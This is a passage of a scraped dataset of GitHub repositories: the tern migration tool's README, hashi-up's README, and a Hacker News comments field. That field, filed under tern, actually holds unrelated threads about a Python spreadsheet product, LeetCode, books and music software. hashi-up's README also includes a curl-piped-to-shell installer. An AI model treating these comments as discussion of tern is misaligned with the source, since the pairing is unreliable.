migration from the current state of the code package.\n\n```\ntern code snapshot path/to/code --migrations path/to/migrations\n```\n\nCode packages have access to data variables defined in your configuration file as well as functions provided by\n[Sprig](http://masterminds.github.io/sprig/).\n\nIt is recommended but not required for each code package to be installed into its own PostgreSQL schema. 
This schema\ncould be determined by an environment variable as part of a blue/green deployment process.\n\n## Template Tips\n\nThe `env` function can be used to read process environment variables.\n\n```\ndrop schema if exists {{ env \"CODE_SCHEMA\" }} cascade;\ncreate schema {{ env \"CODE_SCHEMA\" }};\n```\n\nThe [Sprig dictionary functions](http://masterminds.github.io/sprig/dicts.html) can be useful to call templates with extra parameters merged into the `.` value.\n\n```\n{{ template \"_view_partial.sql\" (merge (dict \"view_name\" \"some_name\" \"where_clause\" \"some_extra_condition=true\") . ) }}\n```\n\n## SSH Tunnel\n\nTern includes SSH tunnel support. Simply supply the SSH host, and optionally\nport, user, and password in the config file or as program arguments, and Tern\nwill tunnel the database connection through that server. When using an SSH tunnel,\nthe database host should be given from the perspective of the SSH server. For example, if\nyour PostgreSQL server is `pg.example.com`, but you only have SSH access, then\nyour SSH host would be `pg.example.com` and your database host would be\n`localhost`.\n\nTern will automatically use an SSH agent or `~/.ssh/id_rsa` if available.\n\n## Embedding Tern\n\nAll the actual functionality of tern is in the github.com/jackc/tern/migrate\nlibrary. If you need to embed migrations into your own application, this\nlibrary can help.\n\n## Running the Tests\n\nTo run the tests, tern requires two test databases to run migrations against.\n\n1. Create a new database for the main tern program tests.\n2. Open testdata/tern.conf.example.\n3. Enter the connection information.\n4. Save as testdata/tern.conf.\n5. Create another database for the migrate library tests.\n6. Run the tests with the connection string for the migrate library tests in the MIGRATE_TEST_CONN_STRING environment variable:\n\n MIGRATE_TEST_CONN_STRING=\"host=/private/tmp database=tern_migrate_test\" go test ./...\n\n## Prior Ruby Gem Version\n\nProjects using the prior version of tern, which was distributed as a Ruby\nGem, are incompatible with the version 1 release. 
However, that version of tern\nis still available through RubyGems and the source code is on the ruby branch.\n\n## Version History\n\n## 1.13.0 (April 21, 2022)\n\n* Add conn string connection config option (vivek-shrikhande)\n* Add Filename to MigrationPgError (davidmdm)\n\n## 1.12.5 (June 12, 2021)\n\n* Look for SSH keys in `~/.ssh/id_rsa` (Miles Delahunty)\n\n## 1.12.4 (February 27, 2021)\n\n* Use user's known_hosts file when connecting via SSH\n\n## 1.12.3 (December 24, 2020)\n\n* Fix reported version number\n\n## 1.12.2 (December 23, 2020)\n\n* Fix setting port from config file\n* Fix non-schema qualified version table not in public but in search path (Tynor Fujimoto)\n\n## 1.12.1 (June 27, 2020)\n\n* Update to latest version of pgx.\n\n## 1.12.0 (June 26, 2020)\n\n* Command code install no longer outputs compiled SQL.\n* Add code compile command to print compiled SQL code package.\n* Better error reporting for code install.\n\n## 1.11.0 (April 10, 2020)\n\n* Add [Sprig](http://masterminds.github.io/sprig/) functions to configuration file and migrations.\n* Add SQL code management distinct from migrations.\n\n## 1.10.2 (March 28, 2020)\n\n* CLI now handles SIGINT (ctrl+c) and attempts to cancel in-progress migration before quitting\n\n## 1.10.1 (March 24, 2020)\n\n* Fix default CLI version-table argument overriding config value\n\n## 1.10.0 (March 7, 2020)\n\n* Better locking to protect against multiple concurrent migrators on first run\n* Update pgx version to support PostgreSQL service files\n\n## 1.9.1 (February 1, 2020)\n\n* Look for version table in all schemas in search_path instead of just the top schema\n\n## 1.9.0 (February 1, 2020)\n\n* Default version table is explicitly in public schema\n* Update to pgx v4 (Alex Gaynor)\n\n## 1.8.2 (July 19, 2019)\n\n* Show PostgreSQL error details\n* Rename internal error type\n\n## 1.8.1 (April 5, 2019)\n\n* Issue `reset all` after every migration\n* Use go modules instead of Godep / vendoring\n\n## 1.8.0 (February 26, 2018)\n\n* Update to latest version of pgx (PostgreSQL driver)\n* Support PGSSLROOTCERT\n* Fix typos and internal cleanup\n* Refactor internals for easier embedding (hsyed)\n\n## 1.7.1 (January 30, 2016)\n\n* Simplify SSH tunnel code so it does not listen on localhost\n\n## 1.7.0 (January 17, 2016)\n\n* Add SSH tunnel support\n\n## 1.6.1 (January 16, 2016)\n\n* Fix version output\n* Evaluate config files through text/template with ENV\n\n## 1.6.0 (January 15, 2016)\n\n* Optionally read database connection settings from environment\n* Accept database connection settings via program arguments\n* Make config file optional\n\n## 1.5.0 (October 1, 2015)\n\n* Add status command\n* Add relative migration destinations\n* Add redo migration destinations\n\n## 1.4.0 (May 15, 2015)\n\n* Add TLS support\n\n## 1.3.3 (May 1, 2015)\n\n* Fix version output\n\n## 1.3.2 (May 1, 2015)\n\n* Better error messages\n\n## 1.3.1 (December 24, 2014)\n\n* Fix custom version table name\n\n## 1.3.0 (December 23, 2014)\n\n* Prefer host config whether connecting with unix domain socket or TCP\n\n## 1.2.2 (May 30, 2014)\n\n* Fix new migration short name\n\n## 1.2.1 (May 18, 2014)\n\n* Support socket directory as well as socket file\n\n## 1.2.0 (May 6, 2014)\n\n* Move to subcommand interface\n* Require migrations to begin with ascending, gapless numbers\n* Fix: migrations directory can contain other files\n* Fix: gracefully handle invalid current version\n* Fix: gracefully handle migrations with duplicate sequence number\n\n## 1.1.1 (April 22, 2014)\n\n* 
Do not require user -- default to OS user\n\n## 1.1.0 (April 22, 2014)\n\n* Add sub-template support\n* Switch to ini for config files\n* Add custom data merging\n\n## 1.0.0 (April 19, 2014)\n\n* Total rewrite in Go\n\n## 0.7.1\n\n* Print friendly error message when database error occurs instead of stack trace.\n\n## 0.7.0\n\n* Added ERB processing to SQL files\n\n## License\n\nCopyright (c) 2011-2014 Jack Christensen, released under the MIT license\n", "readme_type": "markdown", "hn_comments": "I've seen a bunch of companies do this. The problem is always that it isn't Excel. This means usually things like XLWings, Excel-DNA, etc. are actually more useful.Traditionally the business is the source of spreadsheets (data comes from the biz side of the equation). The data analyst then has to make sense of the data.So to convince a BA to input their data on Neptyne because the DA might need to python script it at some point is maybe premature optimization.That's an uphill battle... But I definitely see it a good case for me personally as someone who both originates data (nothing fancy) and needs to process it further...Will definitely check it out!Wow this is cool! I created a similar thing over the summer but never took it anywhere because I felt GSheets would just add Python.https://github.com/ricklamers/gridstudioRooting for you guysI had three minutes, clicked tutorial and got a modal asking me to sign up.Left the page.Wow this is so cool!I'm trying the app tutorial out and some of the calculations (e.g. the sum() step) is taking maybe 30-60 seconds to complete \u2014 is that usual, or are you getting hugged by HN?I think https://www.visidata.org/ also supports pythonLooks cool! Since you mentioned all the magic happening in the backend, how does it run? How do you ensure I am not running malicious Python code, like infinite for loop or never-ending recursion? Also, disabling file or network IO?Did you also explore running Python in the browser using wasm?Please noThis is neat. Congrats on the launch. Having a python repl next to spread sheet will be handy for a lot of user cases.I don't know what to make of the fact that reactivity doesn't seem to be discussed in the docs or the tutorial. I am a fan of ObservableHQ's reactive JavaScript notebooks, in which blocks of code get rerun when their inputs change. This is reactivity in the same sense as spreadsheets are reactive, and it's pretty neat. One nice feature of ObservableHQ is that you can use free variables when writing code blocks, and they will get their values (reactively) from the environment. That is very powerful and it seems to me that plugging a scripting language into a spreadsheet should work that way as well.Interesting! Congrats on the launch.I tried it out, and just first feedback:- I often use the \"Home\" and \"End\" key to go the start/end of the line when I'm editing a cell. It scrolls to start/end of the whole spreadsheet, however. Since I'm not a spreadsheet user, I'm not sure if that's expected.- The handlers like \"on_dropdown_change\" should receive an argument for the cell it's coming from, so you can e.g. change the cell that's next to it. Or how else is this supposed to be done?It's quite cool :-) I suppose one problem could be integration with existing Google Sheets / Excel sheets?Good job! 
i really like the idea and also the implementatino is really good for something totaly new!\nBut as much as i would love to see this as the new MS excel i can't immagine this replacing it.\nI wish you good luck and i hope more ppl will start using this instead of MS exceldoes this neptyne also work off-cloud?\ne.g. now way that i'll upload my data into the void.How is this different from other solutions such as this one: https://equals.app?Congrats ! Looks really cool !I always had this rule of thumb, \"the better a programmer is at spreadsheets, the worse programmer he is\" :D Mostly cause I suck so much at spreadsheets. I always think to myself, dammit I'm a career programmer how come I can't do a double-column lookup across two sheets with my eyes closed :(Anywhoo congrats again, now can we make it work with something nice like Clojure or Lisp :P ?Pricing info? Maybe I'm missing it but I don't see it on the site.How do you manage version control and testing? I can't see anything in the docs about that.Lack of review/tests etc is the main reason IMO that spreadsheets can be very dangerous tools. The more they become production applications the greater the impacts are.Questions:This is a platform as a service?How does the frontend work with the backend, it\u2019s all backend and magic stuff to reflect it on the frontend?Looks cool, but the get started --> skip signup to try now --> empty tyne flow is broken. When I click \"empty tyne\", it just reloads the page and blocks you with \"empty tyne\" again and again.Also, I'm curious if it supports live collaborative editing like google sheets/docs/etc do?This sounds like a really good idea - combining spreadsheet convenience with being able to do programmatic manipulations with python can be really value for people who are using spreadsheets to do modeling (e.g financial). I think (especially based on some other comments) a big challenge will be just getting people out of their current bubble. If you do financial modeling, you might be entrenched in excel, and if you so data science in python, you might never dream of using spreadsheets.My unsolicited advice (that's probably on your radar anyway) would be to try and get a management consulting firm on board with this. The flexibility this has would be well used there, and you've got lots of people who are engineers stuck using spreadsheets that would be on board with trying something like this.How does it interact with libraries that need the file system? e.g. Can I use requests-cache?Very Excited.I'm likely very close to the ideal user. I don't program for work but make CSV-consuming tools from Python here and there to work on giant exports of data when they get outside of Excel's built-in magic.Most recently the exact task was to consume a Zoom user export, filter with RegEx, and transform the table for upload to Zoom as a CSV again, but with different fields. This would translate very well to Neptyne if it supported 70k rows.Very cool but what's to stop Microsoft from doing this in Excel and making it instantly integrated into the software that millions of us already use?I believe Google Sheets supports programmability using Javascript these days. Is your product fundamentally different?\nThanks and all the best.This is really cool and promising product! So many times when I was getting a google docs spreadsheet from non-engineering folks I was wondering if only I can embed a small jupyter notebook with a few python cells and a nice looking pandas chart, using this data.. 
Congrats on the launch!Just some feedback: the landing page dimensions are all out of order. There's a horizontal scrollbar under the \"sneak peak\" section. Never a good thing. The spacing between the heading and the hero image is far too wide.Why do you require a login for the tutorial? I backed out because of it.The concept of Python-based spreadsheets was explored by Resolver One[1], a defunct proprietary desktop app that was discontinued ~10 years ago[2].It seems a web version of the app has been published in open-source[3] but that too has been EOL.[1] https://web.archive.org/web/20120211201410/http://www.resolv...\n[2] https://www.resolversystems.com\n[3] https://github.com/pythonanywhere/dirigible-spreadsheetThis is impressive. It seems like you really understand the requirements of the audience that uses spreadsheets AND data centric Python! The REPL, in particular, is a nice touch.My biggest concern with a tool like this is that the power-iest power users who would love it tend to work at big enterprises where they're locked into productivity suite bundles with Microsoft or Google. Additionally, if you get traction, Google and Microsoft would be very likely to clone your features for Sheets and Excel.Good opportunity to highlight Google \"Apps Script\" which is one of the most powerful but unknown tools in the web:\nhttps://developers.google.com/apps-script/guides/sheetsIncludes easy fetching:\nhttps://developers.google.com/apps-script/reference/url-fetc...I suppose python could be better for this use case but javascript seems to work fine. And it's all built righ in to Google Sheets.Very cool! Does it allow real-time multi-person editing? (It's not very clear from the landing page.)If so - how do you handle multiple people editing the code area at the same time?Would be a killer feature if this was robust!Forced signup to even test it? Hard passThis is cool, but I think it might be missing what the big problems with spreadsheets are.I was complaining just today because I pasted some records into Excel and it decided to treat 933349234275230104 as a number (it's a hash), convert it to scientific notation (which I NEVER want), and lose precision. Yet there is no way to globally disable scientific notation. Plus it's kind of insane that \"formatting\" changes data in the first place.I frequently paste timestamps into Sheets or Excel and it just ruins everything. If split-to-text puts the date part in one column and the time part in another, I can't put them back together with a simple string concatenation, because again \"formatting\" turned my date text into Excel's weird internal number. This is legacy behavior that Excel has to keep for backward compatibility, but I don't want it, and I wish I could turn it off.Sometimes I'll try to scatter-plot 5 series against a timestamp, and Excel will decide all 6 columns are series, even though a scatter plot with no X-axis makes zero sense. Even when it does work, Excel seems stubbornly uninterested in understanding how dates/times work, and I can't do simple things like tell it to have an X-axis tick every day/week/month.If you are building a spreadsheet in 2023, the #1 goal should be leaving behind all the baggage, even if it has to be behind a toggle. Listen to what people find frustrating about Excel (tip: it's gonna be dates) and fix that.If you can do that, then yeah, Python! Woo! Neat! But that's not going to be the main draw, because it's not a solution to the main problems that spreadsheets have.I like this idea. 
If I\u2019m doing anything more than a trivial formula in Excel or Google Sheets then it\u2019s a pain to look up the proper syntax. Just being able to use Python sounds great.> You mix Excel style cell addresses (A1, C3) and ranges (B2:B20)Well, that's unfortunate for \"power\" users - I'd imagine they'd want what excel calls r1c1 mode:https://learn.microsoft.com/en-us/office/troubleshoot/excel/...One of the many valuable lessons from Joel Spolsky \"You suck at Excel\" (around 8:30 mark):\nhttps://youtu.be/0nbkaYsR94cThis would be actually useful if it were offline and didn't require a login.Looking for something like this exactly. Is it possible to install on site? No way my company would want prop data on a cloud.This looks fantastic, and sadly completely misses the mark on a huge industry that uses excel every day: investment management, hedge funds, etc. Why? Because this is yet another cloud only solution with no self hosting possibility.These firms are very-very rich and would pay good money, but a very small %-age will be willing to give you their data. It doesn't matter how many certifications you quote about data treatment, we will simply not trust you with our data, full stop.You say pyxll is a mediocre tool, but IMO they understand how this industry works.Really sad, because the tool itself looks fantastic...Congrats on the launch! I'm the cofounder of Mito[1], an open-core spreadsheet extension to Jupyter that generates the equivalent Python code every time you edit your data. We also think that combining the intuitiveness of spreadsheet UI with the repeatability and large-data-handling-abilities of Python is going to unlock a bunch of Excel-first analysts to save themselves tons of time by automating repetitive reports.One difference in our approach is that the Mito spreadsheet goes from Spreadsheet -> Python code, instead of the other way. For every edit you make in the Mito spreadsheet, we generate the equivalent Python code for you.In practice, this has been really important for us for few reasons:1) A lot of our users are early in their Python journey. They might've taken a Udemy course or done some Kaggle classes, but generally they are not yet comfortable writing a Python script from scratch. Since they already have a ton of work on their plates, if the option is do the report manually in Excel for 2 hours today or spend the next 2 days writing a Python script to automate their work and save them those 2 hours a day each month going forward, they will probably choose to do it manually. By giving them the Python code for the edits that they make, its more like build the report for 2 hours today in Mito and get the Python script automatically so you don't ever have to build the report again.2) There are 1 million and 10 things that users want to do in a report, so by giving the user the equivalent Python code, they're able to use the code they've generated as a starting point, not the finish line. For example [2], one really common use case we've seen is Excel workbooks with the following tabs: input_data, Jan 2020, Feb 2020, \u2026, Dec 2022, \u2026. In each case, the month tab corresponds to the same sort of filtering and transformations of the input data. These users get a huge amount of value out of actually having access to the Python code that they generated. The user will use the Mito spreadsheet to generate tab Jan 2020, turn the Mito generated code into a function, and then apply the function to generate Feb 2020 ... 
December 2022.[1] https://www.trymito.io\n[2] https://blog.trymito.io/automating-spreadsheets-with-python-...\"Supercharge your spreadsheets with Python and AI\"lol, threw in the AI there just in caseor just use pivot table.> Drag the corner from F7 to F9 to compute the total cost for each unit.I do that.> Server connection error: failed to connect to serverI get that the system is overloaded, but if every small action requires a network, and I can't use it with intermittent network let alone offline, I'm not too thrilled.This seems like an amazing idea probably because I know python pretty well... People who can't use python probably won't be into it.Very cool idea. Since it is based on Jupyter Notebook, can I self host this for my needs?Congratulations on the launch! I'm very excited to try replacing my hacked-together AppScript with this.wasn't there some rumours about excel adding python support? what happened to that?Is there an api or cli interface so I don't have to use the web ide?I know python, don't really know VBA. This will open up a new world for me. Excited to try it out.I yet to understand a reason for cell to be addressed by A1 or C1R1 style. put it in a table, give a column a name. Numbers got it right.Cool idea but not ready for primetime. The very first thing in the demo didn't work: couldn't drag the cell and couldn't use command+C to copy the data.On the surface this seems like an impossible market to penetrate. But you must know this. What is the deeper insight that one who thinks this is missing?LibreOffice Calc combined with python's pandas and numpy modules meet all needs I have for spreadsheets, with matplotlib and seaborn for visualization. The Ipython shell is the optimal IDE for this approach IMO. My desktop reference is:\"Python for Data Analysis 2nd ed\" (Wes McKinney, 2018)I remembered Alphasheets was acquired by Google a couple of years ago for doing similar thing (they programmed in Haskell which is really cool) https://medium.com/bloated-mvp/alphasheets-mvp-review-ec328e...Very cool! I constantly struggle trying to do things in spreadsheets that are easy in Python. But I/O makes it annoying to write one-off scripts for a 30 second op. This would solve that pain point!I would love a Google Sheets integration, since that's where I already live with most of my CSV/Sheets data + it would seamlessly fit into my workflow. If this was a Chrome extension I would have installed it today.As is, I don't see myself using another spreadsheet app.What's are the costs? Couldn't find it on the site.I can't understand how this will improve the work. I see the value of having python instead of sheets formulas for python developers, but developers would work on totally different toolsets (like Jupyter notebook, as you mentioned), or something like StreamIt or https://gradio.app/This would be useless for spreadsheet users (those who use sheet formulas) as they have to learn python.I'm not in the target audience, so I might be completely wrong about the use cases.Congrats on the launch. Building a product of this complexity is no easy feat! Out of curiosity: given the old adage that a product needs to be 10x to overcome switching costs, how do you prove users that you are 10x better than Google Sheets or Excel?This is really cool. There was another recent post about something similar: https://news.ycombinator.com/item?id=34805132One question/thought: what's your security like? Inevitably, people treat spreadsheets like databases for better or worse. 
That means they often contain lots of things that might be better stored elsewhere - sometimes PII, sometimes a proprietary formula, set of factors as inputs to a process, etc.So, I think many spreadsheet-heavy businesses will avoid something that doesn't obviously sit inside the fortress of security they've approved. Of course, someone can just accidentally email a spreadsheet to the wrong person or store it somewhere with no security. It happens all the time, I'm under no illusion.Point is: I would be more likely to give it a shot given a base level of confidence about the security of storing anything in these sheets.Interested to hear your take!hey not sure if intended but the hero section looks odd at bigger screen sizes (https://imgur.com/a/j7QH8kJ)FYI There is PyXLL which is an add on for Microsoft excel that gives this functionality without a need to log into any thing.Reminds me a little of the long-defunct \"ResolverOne\" for which the only reference I could find was https://www.python.org/about/success/resolver/I think Gnumeric has supported this for years.https://help.gnome.org/users/gnumeric/stable/sect-extending-...I recall doing a noise model of a transimpedance amp in Gnumeric where I called out to Python/Numpy to do integration of 1/f noise based on parameters from a datasheet. That was at least 10 years ago. What's the difference between this Gnumeric feature and Neptyne?I may be wrong, but most people that know python have already understood there's better ways to code than spreadsheets. Also, at least where I live, not even Google could undermine Excel's dominance.PS: I'm convinced I was indeed wrong after reading replies, because I didn't consider the interaction of coders with no coders, and this tool may indeed be useful. Nevertheless I maintain these cultural changes are very hard, and wish the company good luck!This reminds me a lot of DabbleDB. It was an interesting application written in Seaside, a very cool web framework running inside the Smalltalk VM. They got acquired by Twitter.Did you build this from the ground up or are you leveraging a spreadsheet / grid library behind the scenes? Cool Project!I like the idea: I was actually looking at an open source tool that does something similar: combine spreadsheets with python.I do have a question: Similar tools tend to fall down after the code grows to a certain size. Modularity, unit tests, etc. become more useful at this point. I'm wondering if Neptyne will (or does?) support these sorts of features?Edit: Here's a link to the developer docs: https://docs.google.com/document/d/1zLOXBoy-nf05SU3d5sZ7lDDg...I'd like to try - it's quite a cool idea. But the interface seems broken.Is that the HN hug of death, or my corporate netowrk playing up?This looks really cool.When I try to get started on https://neptyne.com/neptyne/_new though, I get a HTTP 403 for the POST to https://neptyne.com/api/tyne_new and it brings be back to the selection screen.Very cool. I've done plenty of work supporting non-technical users who primarily interact with spreadsheets. This would definitely make my life easier.Is it going to be cloud-only, or are you planning on making a desktop app? If it's cloud-only, you can grab some (hopefully many) Google Sheets users, but most Excel users will probably pass.Hey, this is awesome! As someone who primarily codes in Python, I love that it's first class with a REPL! 
Nothing frustrates me more then when I have to figure out Javascript for scripting in Google Sheets.I ran through your demo and I have some feedback:- Tab completion in the REPL would be great.- When I change code in the editor, it doesn't update the cell where that code is used until I click on the cell, click away, and click back.- When I ran the append function, it worked, but if I look at the array in the cell, it's unchanged. If I click on the cell and hit enter, it wipes out the append. I'm honestly not sure what the right behavior here is, I can see use cases on both sides. But initially I did expect the cell with the array to update with the new array.- When I tried to do autocomplete on the capitals, it failed silently. I assume the API failed to fetch the capitals? It worked on the second try (but took a while).- When I add a column into the sheet, it breaks all the code that has cell references. I'd expect the code with cell references to get updated unless my references are $F$4 for example, just like in the sheet itself.Overall though this is a great start!This is a kind of product that\u2019s easy to scope creep so I\u2019m curious, how many person-months did it take you to build this MVP?Back in 2012, I used Data Nitro / Iron Spread. It enabled running Python on spreadsheets.My problem back then with the tool was that it sat between chairs. It was impossible to run Python entirely, as it only ran a subset of libraries and did not have a package manager, and it required thinking about cells, as is the case with Excel formulas.As a result, I could only use some of my Python codebase and not collaborate with other Excel users who were not Python experts. We ended up reverting to Excel formulas or VBA.I'm curious about who is the target user for Neptyne. Is it Python developers and data scientists who want to do some spreadsheet work?This looks very useful, I can see this being used in schools and universities for a plethora of studies.However I am European in EU, and while your Privacy policy is eminently readable, I don't think it can be used in EU school settings as you do not specify who your 3rd party service providers ar, what their privacy policys are or where data is hosted (thank you for making it human non lawyer readable).Schools/Universities in EU are not allowed to use services that are not hosted in EU.Im not sure if you use Google Analytics but please know that the legality of using GA in EU has been questioned in both Netherlands and Ireland. I'm not up to speed on the proceedings but I believe the Netherlands found it to be in violation of GDPR since the data was not stored or processed in EU. EDIT: Add Austria, France, Italy, Denmark, and now Finland to the list...Founder of AlphaSheets here -- we built this back in 2015 and developed it for 3 years. We built Python, R, SQL and full excel formula/hotkey/format/conditional formatting/ribbon compatibility. It was a long slog!I wish you good luck and all the best. It's a tough field but a big market. And I still think the potential is there.Why choose this over pySpread?https://pyspread.gitlab.ioThere have been a least half a dozen companies and countless FOSS projects attempting to do the exact same thing. What makes this special?can it handle a million rows? 10M?believe it or not this is my biggest problem with Sheets, and while Excel does better it's still capped at 1M1. Keep doing LC easy until they are easy, read and re-read comments and solutions until it sticks. You can get it, but it will take work.2. 
Even though you have MSc (in CS or similar I presume) go back and do an algos class on coursera (or similar).Perhaps focus in a given area/subject.Viewing this question abstractly, you are asking how do I get better at ?The answer is the same. Progressive load. Do something that you struggle with but can complete until it is no longer a huge struggle, then do something harder, progressively. Both biting off more than you can chew and not biting enough will prevent progress.The key thing to understand is that the feeling of struggle is exactly the feeling of learning, particularly for older people. The feeling of struggle is not metaphorically, but physically the precursor to learning. The feeling of struggle is marking brain cells to be altered during sleep (layman's translation of huberman podcast) which is when your brain actuates learning. So you must seek the feeling of struggle to be learning.A video-games dev told me to do Advent of Code instead of the hackerrank/leet-code nonsense -- it'd make me a better programmer that way. I dunno. You can do productive work but hiring is still about solving ridiculous things.Leet code is like prostitution. It\u2019s cheap, short term, and the employment prospects are high risk / low reward.In most of software there is no relation between being a good developer and being either highly valued or highly employable. Being good requires lots of practice solving tough problems. Being highly employable means high familiarity doing average things with tools incapable of solving tough problems.I\u2019d suggest perhaps finding a more senior colleague that can work through a few questions with you just to try and identify where your problem seems to be.However I\u2019d suggest that being able to write and analyse algorithms is more than mindless tick boxing \u2014 it is essential to backend beyond plumbing, so I personally think it\u2019s an investment.If you really only have time for one book, The Psychology of Computer Programming by Gerald Weinberg. Silver anniversary edition, it keeps the vast majority of the text intact and adds commentary between chapters by Weinberg.http://files.catwell.info/misc/mirror/the-unix-programming-e...there's none, try fewDesign Patterns: Elements of Reusable Object-Oriented Software\nhttps://geni.us/GQSURefactoring Improving the Design of Existing Code\nhttps://geni.us/u2s6pKOh wow cool niche question!Keeping complexity down is going to be the main issue (isn\u2019t it always). Music software can get very complex unfortunately.Is your daughter set on doing this \u201cin the box\u201d (on computer)? My first thought is that physical equipment might have easier (or at least more satisfying for a child) learning curves.Hopefully someone can hop in with concrete equipment for mixing or Linux software advice. Mac guy myself.Have you considered an iPad?https://www.bitwig.com/ has a demo and is reasonably priced. It's very similar to Ableton which I've used and really enjoy the workflow of.it\u2019s probably a better idea to get her a looper station from BOSS and a microphone. maybe a cheap keyboard as well from korg. from a few $100 she\u2019ll be set. linux does not really have what she is looking for unless she wants to get into hardcore screwing around with configuring obscure tools and DAWs and plugins which will not get her the results she wants.https://lmms.io/ is free and open source, and similar to FL Studio (though not as full-featured). 
LMMS might have a bit of a learning curve, but having used FL Studio in the past I had no problem plonking out some simple tunes (after downloading some free SoundFonts I found on Google).It should be installable via apt, so it's easy to try it out, anyways!This was me twenty years ago. So mandatory disclaimer, I was classically trained from the age of like 7 to 20.I can't stress enough the value of private instruction. Keyboard and voice lessons are relatively inexpensive (not free, of course, but not the biggest luxury) and access to a keyboard or guitar (those especially!) and a teacher who can show proper technique to play and sing is really great. Music is taught primarily in a master/apprentice form and more important than doodling in a DAW is getting someone to show you how to doodle. A relatively inexpensive keyboard and some lessons on playing will go further than any software. Personally I took keyboard and later recording/production lessons and it really gave me the tools to create.For the tech part, you need three things. A mic to record the voice, a midi keyboard (if you go with lessons you'll need a decent keyboard anyway, and most can be plugged into the computer with USB these days), and a DAW (digital audio workstation). The cheapest form factor now is an iPad with garage band, which is famously user friendly. If you're committed to Linux, bitwig is great but your kid will need to do a lot of self study and practice with YouTube tutorials. Something that can't be beat is a smartphone or tablet with voice memos recording them playing and singing. Audacity can do that.As an avid Linux user with a lot of experience I will say it sucks for beginner audio work. Get a Mac and use GarageBand, it just works.If my kid wanted to make music I'd get them a keyboard and lessons, then a voice recorder to make the music. DAWs are essential for pro work but it's a lot to ingest for beginners. Most teachers will be familiar with how to use them these days, ifs standard fare to teach in college.If she really wants to do something, she can figure it out even if the UX is not extremely simple. Kids are learning machines.Music theory is optional.Why can't she use the same web based application on her laptop? DAWs are, by nature, extremely complicated, Linux or not. If she has something that already works, I don't see why you'd want to change.I'd like to mention SonicPi though. It's a platform for creating music through code, and is used all over the world to teach kids both programming and music production at the same time. It's really cool.Get her Bitwig! The 16-track version would be perfect to start with, and is on sale right now: https://www.bitwig.com/buy/Bitwig is one of the only major audio workstations taking Linux seriously. They're basically building a supercharged version of Ableton Live, and it's got great multiplatform support. If latest PopOS! has PipeWire enabled, then all you need to install is your pipewire-jack package for the audio server, and your bitwig-studio package for Bitwig. Once you have Bitwig installed, you can boot that up and activate it with whichever version you get. It's a seriously powerful tool, and pairs nicely with touchscreen devices. Works great with MIDI enabled hardware, too!i cant wait to have a daughter, ill show her hanna montana linux> At what point do you consider a frontend framework essential and not just a feature?Browser computer games come to mind, it's really difficult to do them without writing tons of JS. 
and when you are forced to write tons of JS it's better to use a framework.\nHowever, a mostly content based website (which is most of the web) doesn't really need a lot of JS so doesn't need a framework.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jsiebens/hashi-up", "link": "https://github.com/jsiebens/hashi-up", "tags": ["hashicorp", "nomad", "consul", "automation", "devops", "go", "raspberry-pi", "nomad-cluster", "vault", "consul-cluster", "vault-cluster", "ssh-agent", "vm", "cloud", "devtools", "golang", "linux", "boundary"], "stars": 548, "description": "bootstrap HashiCorp Consul, Nomad, or Vault over SSH < 1 minute", "lang": "Go", "repo_lang": "", "readme": "# hashi-up\n\nhashi-up is a lightweight utility to install HashiCorp [Consul](https://www.consul.io/), [Nomad](https://www.nomadproject.io) or [Vault](https://www.vaultproject.io/) on any remote Linux host. All you need is `ssh` access and the binary `hashi-up` to build a Consul, Nomad or Vault cluster.\n\nThe tool is written in Go and is cross-compiled for Linux, Windows, MacOS and even on Raspberry Pi.\n\nThis project is heavily inspired on the work of [Alex Ellis](https://www.alexellis.io/) who created [k3sup](https://k3sup.dev/), a tool to to get from zero to KUBECONFIG with [k3s](https://k3s.io/)\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/jsiebens/hashi-up)](https://goreportcard.com/report/github.com/jsiebens/hashi-up)\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n![GitHub All Releases](https://img.shields.io/github/downloads/jsiebens/hashi-up/total)\n\n## What's this for?\n\nThis tool uses `ssh` to install HashiCorp Consul, Nomad or Vault to a remote Linux host. You can also use it to join existing Linux hosts into a Consul, Nomad, Vault or Boundary cluster. First, Consul, Nomad or Vault is installed using a utility script, along with a minimal configuration to run the agent as server or client.\n\n`hashi-up` was developed to automate what can be a very manual and confusing process for many developers, who are already short on time. Once you've provisioned a VM with your favourite tooling, `hashi-up` means you are only 60 seconds away from running `nomad status` on your own computer.\n\n## Download `hashi-up`\n\n`hashi-up` is distributed as a static Go binary. \nYou can use the installer on MacOS and Linux, or visit the Releases page to download the executable for Windows.\n\n``` shell\ncurl -sLS https://get.hashi-up.dev | sh\nsudo install hashi-up /usr/local/bin/\n\nhashi-up version\n```\n\n## Usage\n\nThe `hashi-up` tool is a client application which you can run on your own computer. It uses SSH to connect to remote servers when installing HashiCorp Consul or Nomad. Binaries are provided for MacOS, Windows, and Linux (including ARM).\n\n### SSH credentials\n\nBy default, `hashi-up` talks to an SSH agent on your host via the SSH agent protocol. 
This saves you from typing a passphrase for an encrypted private key every time you connect to a server.\nThe `ssh-agent` that comes with OpenSSH is commonly used, but other agents, like gpg-agent or yubikey-agent are supported by setting the `SSH_AUTH_SOCK` environment variable to the Unix domain socket of the agent.\n\nThe `--ssh-target-key` flag can be used when no agent is available or when a specific private key is preferred.\n\nThe `--ssh-target-user` and `--ssh-target-password` flags allow you to authenticate using a username and a password.\n\n### Guides\n\n- [Installing Consul](docs/consul.md)\n- [Installing Nomad](docs/nomad.md)\n- [Installing Vault](docs/vault.md)\n- [Installing Boundary](docs/boundary.md)\n\n## Resources\n\n[Deploying a highly-available Nomad cluster with hashi-up!](https://johansiebens.dev/posts/2020/07/deploying-a-highly-available-nomad-cluster-with-hashi-up/)\n\n[Building a Nomad cluster on Raspberry Pi running Ubuntu server](https://johansiebens.dev/posts/2020/08/building-a-nomad-cluster-on-raspberry-pi-running-ubuntu-server/)\n\n[Installing HashiCorp Vault on DigitalOcean with hashi-up](https://johansiebens.dev/posts/2020/12/installing-hashicorp-vault-on-digitalocean-with-hashi-up/)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "antchfx/xpath", "link": "https://github.com/antchfx/xpath", "tags": ["xpath", "golang", "xml", "html", "xpath-patterns", "xpath-query", "selects-descendants", "xpath2", "go", "go-xml"], "stars": 549, "description": "XPath package for Golang, supports HTML, XML, JSON document query.", "lang": "Go", "repo_lang": "", "readme": 